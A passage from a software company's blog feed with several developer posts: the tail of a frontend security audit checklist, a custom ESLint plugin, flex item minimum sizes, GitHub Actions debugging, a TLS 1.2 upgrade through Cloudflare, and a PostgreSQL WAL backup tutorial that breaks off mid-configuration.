potentialsecurity risks, and attackers can exploit this to steal sensitive information.</p><h3>6. Avoid attaching tokens to external API requests</h3><p>It is a common practice to have a default header configured for all API requestsin an application. Libraries like <code>axios</code> allow us to configure a default headerfor all requests. This is useful when we need to attach an authentication tokento all requests. However, this can be a potential security risk if we use thesame axios instance to make requests to external APIs. This is because theauthentication token would be attached to all requests made to external APIs,which could be exploited by attackers to gain access to sensitive information.</p><h3>7. Always encode URL paths and parameters</h3><p>It is crucial to consistently encode URL paths and parameters to prevent theexecution of malicious code. Rather than manually encoding URLs each time, it isrecommended to utilize libraries specifically designed for constructing URLssuch as <code>query-string</code> or <code>qs</code>. By leveraging these library functions, you canautomate the encoding process and ensure that URLs are properly sanitized,minimizing the risk of security vulnerabilities associated with unencoded orimproperly encoded data.</p><pre><code class="language-js">import qs from &quot;qs&quot;;const params = {  name: &quot;John Doe&quot;,  age: 25,};const encodedParams = qs.stringify(params);// encodedParams = &quot;name=John%20Doe&amp;age=25&quot;</code></pre><h3>8. Enhance script integrity with the &quot;integrity&quot; attribute</h3><p>To ensure script integrity, add the <code>integrity</code> attribute to the availablescripts. This attribute verifies that the script file hasn't been tampered withand matches the original source. It provides an additional layer of protectionagainst malicious modifications.</p><pre><code class="language-html">&lt;script  src=&quot;https://example.com/myscript.js&quot;  integrity=&quot;sha384-AbCdIjK...&quot;&gt;&lt;/script&gt;</code></pre><h3>9. Remove source maps from the production bundle</h3><p>Source maps are useful during development for debugging purposes, as they mapthe minified or transpiled code back to its original source code. However, in aproduction environment, making the source code easily accessible through sourcemaps can pose a security risk. Attackers can analyze the source code to identifyvulnerabilities, potentially exposing sensitive information or gaining insightinto your application's inner workings. By disabling source maps, you reduce therisk of exposing your codebase to potential attackers. Source maps also providean avenue for potential intellectual property theft. Disabling source maps inthe production build helps protect your intellectual property by making itharder for unauthorized parties to reverse engineer and steal your code.</p><p>Disabling sourcemaps would also disable extensions like React Devtools, ReduxDevtools, etc. which could be used by attackers to gain access to sensitiveinformation.</p><h3>10. Securely manage state</h3><p>Use proper state management practices in your React application. Avoid storingsensitive information in component state or global state management systems thatcan be accessed or modified by unauthorized users. Utilize techniques likesecure context providers or server-side session management to handle sensitivedata securely.</p><h3>11. Evaluate storage and data handling</h3><p>Carefully examine the usage of <code>localStorage</code>, <code>globalProps</code>, and <code>cookies</code> inyour frontend code for sensitive data, such as user credentials, authenticationtokens, user locations, API keys and personally identifiable information.Implement encryption and secure protocols to protect sensitive data whererequired.</p><h3>12. Robust error handling</h3><p>Review your error handling mechanisms to ensure that error messages areinformative but do not divulge sensitive system details or implementationspecifics. Avoid logging or displaying error messages that could potentially aidattackers in exploiting vulnerabilities, like shown below.</p><pre><code class="language-js">try {  // Some code that may throw an error  const userData = await fetchUserData(userId);} catch (error) {  console.error(&quot;Error occurred while fetching user data:&quot;, error);}</code></pre><p>Instead, log errors to a secure backend service and display a generic errormessage to the user. This would prevent attackers from gaining access tosensitive information while still providing a good user experience.</p><pre><code class="language-js">try {  // Some code that may throw an error  const userData = await fetchUserData(userId);  // Process the fetched data} catch (error) {  // Perform appropriate error handling, such as:  // - Providing a user-friendly error message with helpful information  // - Offering options for users to retry the operation  // - Logging the error to a secure logging service for further analysis  // - Implementing fallback behavior or graceful recovery if possible  // Log the error to a secure logging service  logError(error);  // Display a user-friendly error message  toast.error(&quot;Oops! Something went wrong. Please try again later.&quot;);}</code></pre><h3>13. Enforce eslint rules that prevent unsafe practices</h3><p>Leverage eslint rules to enforce best practices and prevent unsafe codingpractices. Below are some recommended eslint plugins that can be used toidentify and prevent potential security vulnerabilities in your application.</p><ul><li><p><a href="https://github.com/nodesecurity/eslint-plugin-security">eslint-plugin-security</a>Identifies potential security hotspots, such as a dangerous regularexpression, square bracket notation, etc.</p></li><li><p><a href="https://github.com/SonarSource/eslint-plugin-sonarjs">eslint-plugin-sonarjs</a>SonarJS rules for ESLint to detect bugs and suspicious patterns in your code.</p></li></ul><h3>14. Implement Content Security Policy (CSP)</h3><p>Content Security Policy is an HTTP header that helps mitigate various webvulnerabilities, including cross-site scripting (XSS) attacks. Define a robustCSP for your web application to specify the trusted sources from which variousresources, such as scripts, stylesheets, or images, can be loaded. Thisrestricts the execution of untrusted code and helps prevent XSS attacks.</p><h3>15. Regularly review and update security measures</h3><p>Perform periodic reviews and updates of your frontend security measures. Stayupdated with the latest security best practices, vulnerabilities, and patches.Continuously monitor security advisories for your dependencies and promptlyaddress any reported security vulnerabilities by updating to secure versions ormigrating to alternative libraries.</p><h2>Conclusion</h2><p>Conducting a frontend security audit is an essential part of safeguarding yourweb application from potential threats. By following the outlined steps andimplementing best practices, you can significantly reduce the risk of securitybreaches and protect your users' data and privacy. Remember, staying proactivein maintaining the security of your frontend codebase is crucial in anever-evolving threat landscape.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Why did we build a custom ESLint plugin?]]></title>
       <author><name>Amaljith K</name></author>
      <link href="https://www.bigbinary.com/blog/eslint-plugin-neeto"/>
      <updated>2023-08-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/eslint-plugin-neeto</id>
      <content type="html"><![CDATA[<p>At <a href="https://neeto.com">neeto</a> we are working on<a href="https://blog.neeto.com/p/neeto-products-and-people">20+ products</a>simultaneously. While we were developing multiple products, we aimed to make allthe products look like they were built by a single developer. They should have aconsistent coding style and should follow our standards &amp; best practices.</p><p>The backend code was fairly clean because of the convention-over-configurationphilosophy of the Ruby on Rails framework. But, since React is just a JSlibrary, developers have the complete freedom to write code in all possible waysJavaScript would allow.</p><p>In the initial stages, when we were building only 4-5 products, the onlyenforcement mechanism we had was pull request reviews, apart from basic lintingusing <a href="https://eslint.org/">ESLint</a> and code formatting using<a href="https://prettier.io/">Prettier</a>. PR reviews quickly turned inefficient as thenumber of products grew. The code reviewers started missing some of the newchanges to the coding standards and continued suggesting the outdated standard.This led to inconsistent code and behavior between products.</p><p>At that time, we thought of building our custom ESLint plugin. Initially, weexpected it to be very hard because of the need to deal with the language AST toidentify the code that didn't follow our standards. However, after someresearch, we discovered a FOSS tool, <a href="https://astexplorer.net">astexplorer</a>,which shows a visual representation of JavaScript AST. With that, writing ESLintplugins for non-standard code became easy.</p><p>The custom plugin was a huge success during the POC itself. It helped ussignificantly in improving the quality of the front-end code. At the time ofwriting this blog, we have 50 custom ESLint rules enforced by the plugin.</p><p>The plugin was named <code>eslint-plugin-neeto</code>, adhering to<a href="https://eslint.org/docs/latest/extend/plugins#name-a-plugin">ESLint's plugin naming conventions</a>.Later, we namespaced it under <code>@bigbinary</code>, to be consistent with our otherfrontend packages. Now the plugin is available as<a href="https://www.npmjs.com/package/@bigbinary/eslint-plugin-neeto"><code>@bigbinary/eslint-plugin-neeto</code></a>.</p><h2>Enforcing ESLint at neeto</h2><p>In the overall development flow, ESLint will run on three levels.</p><ol><li><h4>IDE extension (optional)</h4><p>Even though BigBinary doesn't have any IDE preference, the majority ofdevelopers use <a href="https://code.visualstudio.com">Visual Studio Code</a> here. Thepopular<a href="https://marketplace.visualstudio.com/items?itemName=dbaeumer.vscode-eslint">ESLint extension</a>on VS Code runs ESLint while the developer is writing code and givesimmediate visual feedback with squiggly lines.</p><p><img src="/blog_images/2023/eslint-plugin-neeto/ide-extension.gif" alt="ESLint extension on VS Code"></p><p>The use of IDE extension is completely optional. We have enforcementmechanisms at other levels to ensure the code quality &amp; standards.</p></li><li><h4>Pre-commit hook</h4><p>There are some ESLint rules like<a href="https://eslint.org/docs/latest/rules/sort-imports">sort-imports</a> that areonly meant to keep code consistency. Even though functionality-wise, thereis nothing wrong with keeping the imports in any order, this rule wouldthrow an error if the imports are not correctly sorted.</p><p>Secondly, developers will see this error frequently because most IDEs addthe new import statement to the bottom of the imports list duringauto-import.</p><p><img src="/blog_images/2023/eslint-plugin-neeto/import-order.gif" alt="Auto import and import-order errors"></p><p>But, we believe that developers should not be concerned about errors likethese. They should be focusing on the business logic rather than spendingtime on things that are auto-correctable. At the same time, we need thisrule to be auto-fixed at some point to keep consistency.</p><p>So, we chose Git's pre-commit hooks for automatically fixing such errors. Weused <a href="https://www.npmjs.com/package/husky">husky</a> to add <code>eslint --fix</code>command to the pre-commit hook. Also, we used<a href="https://www.npmjs.com/package/lint-staged">lint-staged</a> to run the commandsonly on the files that are included in the current commit. Thus, weautomated lint-fixing and formatting of the files that we are going tocommit.</p><p>If any rule violations aren't auto-fixable, the commit would fail with anerror. Developers can get the details of the rule violation from the errormessage, make corrections themselves, and commit again.</p><p><img src="/blog_images/2023/eslint-plugin-neeto/precommit-hook.gif" alt="Pre-commit hook"></p></li><li><h4>CI checks</h4><p>VS Code extension and pre-commit hooks are great tools to warn developersearly and it saves time. However, VS Code extensions and pre-commit hooksare not something we can rely on fully. That's because the developer canskip these if they prefer to.</p><p>Here are some cases where things might not work out:</p><ul><li>Lint checks from both the pre-commit hook and VS Code extension won't runif the developer forgets to run <code>yarn install</code> while setting up therepository. This is because the installation and setting up of all the npmpackages in a repository is done by <code>yarn install</code> command. So, thepackages <a href="https://www.npmjs.com/package/eslint">eslint</a>,<a href="https://www.npmjs.com/package/husky">husky</a>, and<a href="https://www.npmjs.com/package/lint-staged">lint-staged</a> won't beavailable to run until <code>yarn install</code> is run.</li><li>Developers can manually skip Git's pre-commit hooks by running<code>git commit --no-verify</code>. The <code>--no-verify</code> flag indicates that I want tocommit the changes, but I don't want the hooks to run and block me.</li></ul><p>To ensure that the code that goes into the repository is lint-free, we needto implement continuous integration (CI) checks. With CI checks in place,the PR (Pull Request) reviewer can know whether a PR meets the qualitystandards just by looking into this section of the PR:</p><p>Passing CI checks<img src="/blog_images/2023/eslint-plugin-neeto/ci-checks.png" alt="CI checks on github"></p><p>Failing CI checks<img src="/blog_images/2023/eslint-plugin-neeto/failed-ci-checks.png" alt="Failed CI checks on github"></p><p>From the CI checks, we will run ESLint without the <code>--fix</code> flag. The goal ofCI checks is to detect and report lints and not correct them.</p><p>For CI, currently, we are using an in-house developed tool named<a href="https://www.neeto.com/neetoci">NeetoCI</a>.</p></li></ol><h2>Challenges we faced</h2><p><a href="https://neeto.com">neeto</a> is building a lot of products. All these products hada lot of code written in a non-standard way. It meant that when we got startedwith the code standardization task, we had to deal with a large amount of codeto fix.</p><p>Some of the non-standard codes were auto-correctable. For such cases, wepublished ESLint rules withan auto-fixer. Whenever anyone makes any changes in afile containing that non-standard code pattern, it would get auto-correctedduring the pre-commit hook execution. It was easy.</p><p>But some cases weren't auto-fixable. For such patterns, we published the ESLintrule and then asked a few engineers to go through all projects and run thecommand <code>eslint app/**/*.{js,jsx,json}</code>. It would reveal all pieces of code thatviolate the new rule. Those errors had to be fixed manually. We named thisprocess <strong>rollout</strong>.</p><p>While doing this, we realized that we were not thinking much about falsepositives and true negatives. We started encountering them a lot during therollout. It forced us to make fixes, publish the updates again to npm, and redothe rollout. This was inefficient.</p><p>After facing such incidents, we decided to clone all repos locally and test thechanges in all products before raising PR. Even though it was hard at thebeginning, it proved to be quite effective in detecting all possible edge casesof a rule.</p><p>Later, we began developing rules for more complex, abstract standards. It wasimpossible to detect and flag all non-standard code patterns for them. If westressed covering more cases, we would start getting several false positivesalong with it.</p><p>A good example would be the <code>hard-coded-strings-should-be-localized</code> rule. Theaim was to force people to use <code>i18next</code> based localization instead ofhardcoding strings in English. In other words, all the strings that are supposedto be rendered on the DOM should come from the translation files.</p><p>If we were to flag all string literals as errors in the code, we would have morefalse positives than real errors. There were several strings like <code>enum</code> keysthat were used only in the application logic. They will never be rendered on UI.There is no point in applying localization to them.</p><p>As you might guess, there is no way an ESLint plugin could tell if a string isgoing to be rendered in the UI or if it is used only in the application logic.To circumvent this, we decided to raise an error if the string contains a spacecharacter in it. Since enum keys didn't contain spaces, it eliminated a lot offalse positives. But, it created a lot of true negatives. We were missing allone-word strings that were rendered in the UI.</p><p>Also, even with that change, we didn't fully eliminate false positives. Therewere several cases where we used space-separated strings in the applicationlogic. An example is <code>classNames</code> prop. It usually contains a space-separatedstring of CSS classes (like <code>classNames=&quot;flex justify-center&quot;</code>).</p><p>To minimize such edge cases, we added a whitelist for property names like<code>classNames</code> which should always be ignored, and a blacklist for properties like<code>label</code> which should always be flagged even if it is a single word. With thatchange, we were able to lower the false positives and true negatives to a greatextent.</p><p>Even with all this logic in place, we weren't confident that we have eliminatedfalse positives fully. So we decided to publish this rule as a warning. ESLintwarnings are less strict than errors. VS Code extension would still show yellowsquiggly lines and we would still get warning statements while runningpre-commit hooks. But the pre-commit hook won't fail when a warning isencountered. The same applies to the CI checks.</p><p><img src="/blog_images/2023/eslint-plugin-neeto/eslint-warning.png" alt="ESLint warnings in VS Code"></p><h2>Lessons learned</h2><p>In the case of ESLint rules, false positives are more harmful than truenegatives. If a false positive error is raised, it would confuse the developers.Even though they are writing code in the right way, the plugin would complainthat it is an error. Some developers might even write some tricky code tocircumvent the ESLint error, thinking that it is genuine.</p><p>We always try to minimize false positives by testing the rule with the existingcode in several repos before publishing it. In some cases, we can't avoid veryrare false positives to favor a large number of true negatives. If a developerencounters false positives for such rules, they are advised to disable the rulefor that specific line of code.</p><p>Building ESLint rules not only helped us improve the code quality but also gaveus exposure to AST parsing and manipulation. With the help of that newknowledge, we were able to accomplish several other achievements. As an example,we have built a custom Babel plugin that could generate the boilerplate code of<a href="https://github.com/pmndrs/zustand#selecting-multiple-state-slices">fetching values from a Zustand store</a>at compile time. You can read about how you can build your own ESLint and Babelplugins on our upcoming blogs. Stay tuned.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding the automatic minimum size of flex items]]></title>
       <author><name>Praveen Murali</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-the-automatic-minimum-size-of-flex-items"/>
      <updated>2023-08-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-the-automatic-minimum-size-of-flex-items</id>
      <content type="html"><![CDATA[<h3>Introduction</h3><p>Flexbox is a powerful CSS layout module that allows us to create flexible andresponsive user interfaces. However, when dealing with flex items that containtext, we may encounter issues where the text overflows its container, disruptingthe user interface. In this article, we'll explore the problem of text overflowin flex items and learn about the automatic minimum size behavior of flex items.</p><h3>The problem</h3><p>Consider a scenario where we have a card component with a title that can belengthy. To prevent the card from becoming too large and breaking the layout, wewant to truncate the title and show an ellipsis when it overflows its container.</p><p>However, even after applying the necessary CSS properties such as<code>white-space: nowrap</code>, <code>overflow: hidden</code>, and <code>text-overflow: ellipsis</code> to<code>card__title</code>, the text doesn't truncate as expected. The card content doesn'tshrink to accommodate the overflowing text, resulting in an undesired UI.</p><p><img src="/blog_images/2023/understanding-the-automatic-minimum-size-of-flex-items/the-issue.png" alt="issue.png"></p><p><strong>HTML</strong></p><pre><code class="language-css">&lt;div class=&quot;card&quot;&gt;  &lt;div class=&quot;card__avatar&quot;&gt;&lt;/div&gt;  &lt;div class=&quot;card__content&quot;&gt;    &lt;p class=&quot;card__title&quot;&gt;This is anexampleofalengthytitle&lt;/p&gt;    &lt;p class=&quot;card__description&quot;&gt;some text here&lt;/p&gt;  &lt;/div&gt;&lt;/div&gt;</code></pre><p><strong>CSS</strong></p><pre><code class="language-css">.card {  display: flex;  align-items: center;  width: 260px;  gap: 10px;  padding: 10px;  margin: 20px;  background-color: #ffffff;  border-radius: 10px;}.card__avatar {  flex-shrink: 0;  width: 50px;  height: 50px;  background-color: #aac4ff;  border-radius: 50%;}.card__content {}.card__title {  white-space: nowrap;  overflow: hidden;  text-overflow: ellipsis;  font-size: 20px;  margin: 0;}.card__description {  font-size: 14px;  margin: 0;}</code></pre><h3>Why is it not shrinking?</h3><p>The default value of<a href="https://developer.mozilla.org/en-US/docs/Web/CSS/flex-shrink">flex-shrink</a> of aflex item is <code>1</code>, which means the <code>card__content</code> should be able to shrink asmuch as it wants to. Surprisingly, the result is not what we expected!</p><p>The flexbox algorithm refuses to shrink a child below its minimum size.</p><p>When there is text inside an element, the minimum size is determined by thelength of the longest string of characters that cannot be broken.</p><p>Flexbox specification:</p><blockquote><p>To provide a more reasonabledefault<a href="https://www.w3.org/TR/css-sizing-3/#min-width">minimum size</a>for<a href="https://www.w3.org/TR/css-flexbox-1/#flex-item">flex items</a>,the used value ofa<a href="https://www.w3.org/TR/css-flexbox-1/#main-axis">main axis</a><a href="https://www.w3.org/TR/css-sizing-3/#automatic-minimum-size">automatic minimum size</a>ona<a href="https://www.w3.org/TR/css-flexbox-1/#flex-item">flex item</a>that is nota<a href="https://www.w3.org/TR/css-overflow-3/#scroll-container">scroll container</a>isacontent-based minimum size;for<a href="https://www.w3.org/TR/css-overflow-3/#scroll-container">scroll containers</a>the<a href="https://www.w3.org/TR/css-sizing-3/#automatic-minimum-size">automatic minimum size</a>iszero, as usual.</p></blockquote><h3>The solutions</h3><p>To overcome the issue of the flex item not shrinking as expected, we can applyone of the following solutions:</p><p><strong>Solution 1 :</strong> Set <code>min-width: 0;</code></p><pre><code class="language-css">.card__content {  min-width: 0;}</code></pre><p>By explicitly setting <code>min-width: 0;</code> on the flex item, we can override thedefault behavior and allow the element to shrink beyond its automatic minimumsize. This change enables the flex item to adjust its size to accommodate theellipsis and prevent UI disruption.</p><p><img src="/blog_images/2023/understanding-the-automatic-minimum-size-of-flex-items/min-width-fix.gif" alt="May-26-2023 18-33-48.gif"></p><p><strong>Solution 2:</strong> Set <code>overflow: hidden;</code></p><pre><code class="language-css">.card__content {  overflow: hidden;}</code></pre><p>Setting <code>overflow: hidden;</code> alone can also help. This property ensures that anyoverflowing content is hidden, which indirectly allows the flex item to shrinkproperly.</p><p><img src="/blog_images/2023/understanding-the-automatic-minimum-size-of-flex-items/overflow-hidden-fix.gif" alt="May-26-2023 18-34-28.gif"></p><p><a href="https://codesandbox.io/s/the-automatic-minimum-size-of-flex-items-0fyimb?file=/src/styles.css"><strong>codesandbox demo</strong></a></p><h3>Conclusion</h3><p>Understanding the automatic minimum size behavior of flex items is crucial forcreating effective and visually pleasing web layouts. By implementing thesuggested solutions, you can overcome the challenges associated with textoverflow and achieve the desired UI outcomes.</p><p>Happy coding </p>]]></content>
    </entry><entry>
       <title><![CDATA[Debugging high GitHub action usage]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/high-github-action-usage"/>
      <updated>2023-08-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/high-github-action-usage</id>
      <content type="html"><![CDATA[<p>During the development of <a href="https://neeto.com">neeto</a> we noticed arbitrarily veryhigh GitHub action usage. I investigated the matter and made this video to showto my team members how I went about debugging this issue. The video is beingpresented &quot;as it was recorded&quot;.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/eS4BAhk7DAo&quot;title=&quot;Debugging high GitHub action usage&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote>]]></content>
    </entry><entry>
       <title><![CDATA[Upgrading to TLS 1.2 using Cloudflare]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/upgrading-tls-using-cloudflare"/>
      <updated>2023-08-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/upgrading-tls-using-cloudflare</id>
      <content type="html"><![CDATA[<p><a href="https://neeto.com/neetocal">NeetoCal</a> is one of the products built under<a href="https://neeto.com">neeto</a>. NeetoCal makes it easier to manage meetings. Wewanted to allow users to use Zoom as one of the ways to have online meetings. Wesubmitted the NeetoCal app for approval to the Zoom team. The Zoom security teamnotified us that they could not approve the app, because the app was supportingTLS 1.0 and TLS 1.1.</p><p><img src="/blog_images/2023/upgrading-tls-using-cloudflare/zoom-tls-issue.png" alt="zoom tls issues"></p><p>We checked with SSLlabs and it said the same thing: the servers support TLS 1.0and TLS 1.1.<img src="/blog_images/2023/upgrading-tls-using-cloudflare/older-tls-support.png" alt="support for older TLS"></p><p>TLS 1.0 was published in 1999, and TLS 1.1 was published in 2006. Microsoft andother companies don't support these two versions of TLS. Even Heroku<a href="https://help.heroku.com/G0YVUNPG/how-do-i-disable-support-for-tls-1-0-or-1-1-on-a-heroku-app">doesn't support</a>it.</p><p>All our Neeto applications are hosted on Heroku. If Heroku doesn't support TLS1.0 and TLS 1.1, how come the server supports these older versions of TLS?</p><h2>Solving the TLS issue using Cloudflare</h2><p>We use <a href="https://www.cloudflare.com/">Cloudflare</a> as our DNS server for all Neetoproducts. Cloudflare allows us to proxy the request. It means that when the userhits neetocal.com, their request is not going to Heroku. Cloudflare willintercept the request, and then Cloudflare will make a request to the Herokuserver on behalf of the user. When Cloudflare makes this request to Heroku willuse its own SSL certificate.</p><p>Cloudflare allows us to have control over the &quot;Minimum TLS version&quot; to support.We configured Cloudflare to not support TLS 1.0 and TLS 1.1.</p><p>The following video goes into step-by-step detail on how we configured this inCloudflare.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/sED8_Qwmi2w&quot;title=&quot;Upgrading to TLS 1.2 using Cloudflare&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><p><a href="https://www.cdn77.com/tls-test">CDN77</a> is the service we used in the video tocheck the TLS version.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Continuous backup of PostgreSQL in NeetoDeploy]]></title>
       <author><name>Abhishek T</name></author>
      <link href="https://www.bigbinary.com/blog/postgresql-continuos-rollback-feature"/>
      <updated>2023-08-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/postgresql-continuos-rollback-feature</id>
      <content type="html"><![CDATA[<p><a href="https://neeto.com/neetodeploy">NeetoDeploy</a> is a Heroku alternative fordeploying web applications. Currently, NeetoDeploy is being used by Neeto for allpull request review applications and the staging application. NeetoDeploy is aplatform as a service (PaaS) solution that makes it easy to manage and deployapplications with features like database backup, auto deployment from GitHub,live logs, SSL certificates management, auto scaling, and more.</p><p>NeetoDeploy's PostgreSQL add-on has a continuous backup feature. This featureallows you to roll your database back to a specific time in the past. We cansplit the continuous backup process into data backup and recovery. Let's discussthese steps in detail.</p><h2>Initial setup</h2><p>Let us create a new PostgreSQL cluster and populate it with some data.</p><h4>Creating parent database</h4><pre><code class="language-bash">initdb /usr/local/var/postgresql-parent</code></pre><h4>Creating some sample data</h4><p>Start the PostgreSQL server and log in using <code>psql</code>. Provide the role and password ifneeded.</p><pre><code class="language-bash">pg_ctl -D /usr/local/var/postgresql-parent startpsql -d postgres</code></pre><h4>Create a new table</h4><pre><code class="language-sql">postgres=#CREATE TABLE customers (  user_id SERIAL PRIMARY KEY,  username VARCHAR(50),  email VARCHAR(100),  registration_date DATE);</code></pre><h4>Seed sample data</h4><pre><code class="language-sql">postgres=#INSERT INTO customers  (username, email, registration_date)VALUES('johndoe', 'johndoe@example.com', '2021-01-01'),('janedoe', 'janedoe@example.com', '2021-02-15'),('bobsmith', 'bobsmith@example.com', '2021-03-10'),('sarahlee', 'sarahlee@example.com', '2021-04-05'),('maxwell', 'maxwell@example.com', '2021-05-20');</code></pre><h2>Data backup</h2><p>To perform recovery, we need to have access to the existing data. Hence we muststore all the database changes in a separate location, allowing us to utilizethis data for recovery.</p><p>This is where the<a href="https://www.postgresql.org/docs/current/wal-intro.html">Write Ahead Log (WAL)</a>in PostgreSQL comes into play. PostgreSQL follows a mechanism that writes alltransactions to the WAL before committing them to the table data files. Bypreserving the WAL, we can reconstruct the data by traversing the loggedtransactions. Utilizing the information stored in the WAL, we can systematicallyreapply the recorded transactions to recreate the data and achieve the desiredrecovery. Your WAL files are in your PostgreSQL data directory's <code>pg_wal</code>folder.</p><h3>WAL archiving</h3><p>As data modifications occur in the databases, new WAL files are generated whileolder WAL files are eventually discarded. Therefore, it is crucial to store theWAL files before they are deleted. Here we will use an<a href="https://aws.amazon.com/s3/">AWS S3 bucket</a> to store our WAL files. Also, wewill use <a href="https://github.com/wal-e/wal-e">wal-e</a> and<a href="https://pypi.org/project/envdir/">envdir</a> to simplify the process.</p><h4>Install helper modules</h4><pre><code class="language-bash">python3 -m pip install wal-e envdir</code></pre><p>If you face any dependency issues, please refer<a href="https://github.com/wal-e/wal-e">wal-e</a> to fix them.</p><h4>Store AWS S3 credentials</h4><p>To use &quot;envdir&quot; with your AWS credentials, store them in a folder. The followingcode snippet demonstrates how to accomplish this:</p><pre><code class="language-bash">mkdir ~/wal-e.envecho &quot;YOUR_AWS_REGION&quot; &gt; ~/wal-e.env/AWS_REGIONecho &quot;YOUR_AWS_SECRET_ACCESS_KEY&quot; &gt; ~/wal-e.env/AWS_SECRET_ACCESS_KEYecho &quot;YOUR_AWS_ACCESS_KEY_ID&quot; &gt; ~/wal-e.env/AWS_ACCESS_KEY_IDecho &quot;YOUR_AWS_STORAGE_PATH&quot; &gt; ~/wal-e.env/WALE_S3_PREFIX</code></pre><h4>Configure WAL archiving</h4><p>Now, let's configure PostgreSQL to store the WAL files in your S3 bucket beforethey are deleted. Open your PostgreSQL configuration file &quot;postgresql.conf&quot;,which is located in your data directory i.e.,&quot;/usr/local/var/postgresql-parent&quot;, and make the following changes.</p><pre><code class="language-bash"># To enable WAL archiving.archive_mode = on# Determines how much information is written to the WAL.wal_level = replica# Force PostgreSQL to switch WAL file in every 60 secondsarchive_timeout = 60# Command for pushing the wal files to the S3 bucket.archive_command = 'envdir ~/wal-e.env wal-e wal-push %p'</code></pre><p>You can find more information about the above configurations by referring tothis<a href="https://www.postgresql.org/docs/current/runtime-config-wal.html#GUC-ARCHIVE-COMMAND">documentation</a>.</p><p>Now let's restart the server.</p><pre><code class="language-bash"> data_directory=&quot;/usr/local/var/postgresql-parent&quot; pg_ctl -D $data_directory restart -l $data_directory/postgresql.log</code></pre><p>You can watch the PostgreSQL logs like this.</p><pre><code class="language-bash"> tail -f /usr/local/var/postgresql-parent/postgresql.log</code></pre><p>After starting your server, monitor the PostgreSQL logs. If you don't observeany WAL archive logs even after 60 seconds, it is because a WAL file switch willonly occur if there are any modifications. To generate the desired outcome, makeupdates in the database. Upon doing so, you will be able to see lines similar tothe following in your PostgreSQL logs:</p><pre><code>Message: 'MSG: completed archiving to a file\nDETAIL: Archiving to &quot;s3://neeto-deploy-backups/local/wal_005/000000020000000000001.lzo&quot; complete at 158.209KiB/s.\nSTRUCTURED: time=2023-05-18T06:22:27.613242-00 pid=263 action=push-wal key=s3://neeto-deploy-backups/local/wal_005/000000020000000000001.lzo prefix=local/ rate=158.209 seg=000000020000000000001 state=complete'</code></pre><h3>Base backup</h3><p>Since we have enabled WAL archiving, all new changes are stored in the bucket asWAL files. However, what about the data we created before configuring WALarchiving? To ensure a complete recovery, we also need that data. Therefore, weneed to take a base backup of our database. The following code will initiate thebase backup process and push it to the S3 bucket.</p><pre><code class="language-bash">envdir ~/wal-e.env wal-e backup-push /usr/local/var/postgresql-parent</code></pre><p>Running the above command yields the following output.</p><pre><code>wal_e.main   INFO     MSG: starting WAL-EDETAIL: The subcommand is &quot;backup-push&quot;.STRUCTURED: time=2023-05-18T06:24:27.613242-00 pid=41178wal_e.worker.upload INFO     MSG: begin uploading a base backup volumeDETAIL: Uploading to &quot;s3://neeto-deploy-backups/local/basebackups_005/base_000000010000000000005_00000040/tar_partitions/part_00000000.tar.lzo&quot;.STRUCTURED: time=2023-05-18T06:24:29.527622-00 pid=41178wal_e.worker.upload INFO     MSG: finish uploading a base backup volumeDETAIL: Uploading to &quot;s3://neeto-deploy-backups/local/basebackups_005/base_000000010000000000005_00000040/tar_partitions/part_00000000.tar.lzo&quot;complete at 1459.68KiB/s.STRUCTURED: time=2023-05-18T06:24:33.121716-00 pid=41178NOTICE:  all required WAL segments have been archived</code></pre><p>After completing the base backup, you can verify the presence of the base backupfolder in your S3 bucket. Now we have the backup and new WAL files are beingpushed to our bucket.</p><h2>Data recovery</h2><p>Let's consider a scenario where you need to perform a rollback. Suppose youaccidentally deleted a table from your database that contained multiple records,making it impractical to recall and reinsert them manually. As a first step,make a note of the time at which the table was deleted. For instance, let's sayit occurred on 2023-05-18 11:57:11 UTC. The objective is to roll back to a pointbefore that time. Let's roll back to 2023-05-18 at 11:57:00 UTC.</p><h3>Let's make a mistake</h3><p>We are going to drop a table.</p><pre><code class="language-sql">postgres=#DROP TABLE customers;</code></pre><p>Note the time the table got deleted. Here it is 2023-05-18 11:57:11 UTC. Nowlet's discuss how we can restore the deleted table.</p><h3>Creating a new data directory</h3><p>Let's create a new data directory where we can recover the data.</p><pre><code class="language-bash">initdb /usr/local/var/postgresql-child</code></pre><h3>Fetch the base backup</h3><p>The base backup serves as the starting point, while the remaining data will beregenerated by PostgreSQL using the WAL files. To fetch the base backup, you canuse the following code snippet.</p><pre><code class="language-bash">envdir ~/wal-e.env wal-e backup-fetch /usr/local/var/postgresql-child LATEST</code></pre><p>The &quot;LATEST&quot; tag will pull the latest base backup if multiple base backups arein the bucket. On running the above command you will receive an output similarto the following.</p><pre><code>wal_e.main   INFO     MSG: starting WAL-EDETAIL: The subcommand is &quot;backup-fetch&quot;.STRUCTURED: time=2023-05-18T06:29:22.826910-00 pid=41789wal_e.worker.s3.s3_worker INFO     MSG: beginning partition downloadDETAIL: The partition being downloaded is part_00000000.tar.lzo.HINT: The absolute S3 key is local/basebackups_005/base_000000010000000000000005_00000040/tar_partitions/part_00000000.tar.lzo.STRUCTURED: time=2023-05-18T06:29:24.674572-00 pid=41789</code></pre><h3>Configuring recovery</h3><p>Now, we need to regenerate the remaining data from the WAL files. To do that,make the following changes in the PostgreSQL configuration file.</p><pre><code class="language-bash">#postgresql.conf# Command to fetch each wal 